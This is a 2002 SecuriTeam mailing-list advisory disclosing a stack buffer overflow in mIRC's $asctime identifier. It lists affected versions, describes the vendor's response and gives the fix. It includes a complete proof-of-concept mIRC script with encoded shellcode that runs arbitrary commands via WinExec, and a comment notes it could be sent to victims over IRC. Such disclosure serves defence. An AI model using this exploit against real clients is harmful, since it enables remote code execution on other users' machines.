[NT] mIRC $asctime Buffer Overflow

From: support@securiteam.com
Date: 08/27/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 27 Aug 2002 21:24:40 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  mIRC $asctime Buffer Overflow
------------------------------------------------------------------------

SUMMARY

mIRC provides scripting capabilities to allow extension of the client. A
flaw exists in the $asctime identifier, which is used to format UNIX style
time stamps. Passing a string of sufficient length to $asctime will cause
a buffer overflow on the stack. This allows the execution of byte code
through calling $asctime with a carefully constructed string.

The default script included with mIRC does not call $asctime at any point.
However the majority of major scripts available for download call $asctime
to decode data provided by the IRC server. Many scripts call $asctime on
data provided from other remote sources. The exploitation of this flaw
therefore depends on the script installed by the victim.

DETAILS

Vulnerable systems:
 * mIRC version 6.02
 * mIRC version 6.01
 * mIRC version 6.00 and prior

Immune systems:
 * mIRC version 6.03

Details:
$asctime can be called in four forms, depending on the number and type of
parameters passed:

 * No parameters e.g. "//echo 1 $asctime hello!", this formats the current
time as mIRC wishes.
 * With a time format only e.g. "//echo 1 $asctime(hh:mm) hello!", this
formats the current time using the format specified.
 * With a time stamp only e.g. "//echo 1 $asctime(10203234) hello!", this
formats the time stamp specified as mIRC wishes.
 * With both a time stamp and a time format e.g. "//echo 1
$asctime(1020334,hh:mm)", this formats the specified timestamp as
specified by the format string.

The format parameter is where the overflow occurs. If only one parameter
is specified mIRC will treat it as a timestamp (as per form 3) if it only
contains numeric characters, otherwise the parameter will be treated as a
time format. Vulnerable scripts contain code similar too "//echo 1 uuuppz
is idle since $asctime($4)", where $4 is a taken directly from the IRC
server or some other remote source.

If the string passed as the format specified is longer than 388bytes the
return address on the stack will be overwritten. There are a number of
special characters that cannot be used in the string, the ASCII codes for
this are [72,84,90,100,104,109,110,115,116,121,122]. Other characters may
not be possible to use depending on the circumstances.

Impact:
Low to high, a vanilla installation of mIRC does not contain any attack
vector to allow a remote compromise. However many scripts introduce an
attack vector allowing arbitrary code execution through exploitation of
this flaw.

Vendor Response:
Vendor was informed on the 30/7/2002, along with being provided the proof
of concept code. mIRC 6.03 was released on the 16/08/02 that includes a
fix for this issue. No response was sent to James. It is worth noting that
the vendor has not made any effort to inform its userbase of this flaw or
the flaw in versions prior to 6.0 which was released earlier this year. As
a result a large number of users have not upgraded, of course its
difficult to make all users upgrade but vendor recognition is a big
factor.

Using a rather rough method James performed mass CTCP VERSION'S on several
major channels, located on a number of networks. Around 30% of users seem
still run mIRC 5.91 or lower. About 60% are using mIRC 6.00-6.02.

A number of major scripts currently advise users not to upgrade to mIRC
6.00 or later as they do not work on the new version. Hence, users of
these scripts are not being encouraged to upgrade. Vendor acknowledgement
of the flaws in James's opinion would help persuade the maintainers of
these scripts to take actions that are more aggressive.

Solution:
Download mIRC 6.03 from <http://www.mirc.com> http://www.mirc.com

Exploit:
Below is sample mIRC script code that creates a string that causes
$asctime to executed a command line. Parameters may be given. The code
functions on all vulnerable versions of mIRC and all supported operating
systems.

; Proof of concept Code for asctime exploit
; Author: James Martin
; Website: http://www.uuuppz.com
; Email: me@uuuppz.com
;
; Usage:
; /asctime_poc notepad c:\autoexec.nat
; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
; etc :)
;
;
/asctime_poc {
; Set Show State
;
; Valid Values:
; 1 - Show Normal (This will break a ctcp request)
; 2 - Minimise (If your being evil... ;))
; 3 - Maximise
set %showstate 2

; Build Coded Command String
set %command $1-
set %count 1
unset %codedcommand
:loop
set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command,
%count, 1))))
set %count $calc( %count + 1)
if %count <= $len(%command) goto loop

; Shell Code to Execute
;
; Detects mirc version, decodes the command string then calls winexec
set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+
$chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24)
$+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184)
$+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19)
$+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+
$chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235)
$+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255)
$+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate )
$+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+
$chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+
$chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139)
$+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+
$str($chr(255),3)

; Build Exploit String
set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a,
$calc(300-2-$len(%command))) $+ q $+ $chr(17) $+ $chr(64)

; Run exploit string
;
; In the real world it would be more like
; /msg muppet weirdcommand %exploitstring
echo 1 $asctime(%exploitstring)
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:fulldisclose@uuuppz.com>
James Martin (uuuppz).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages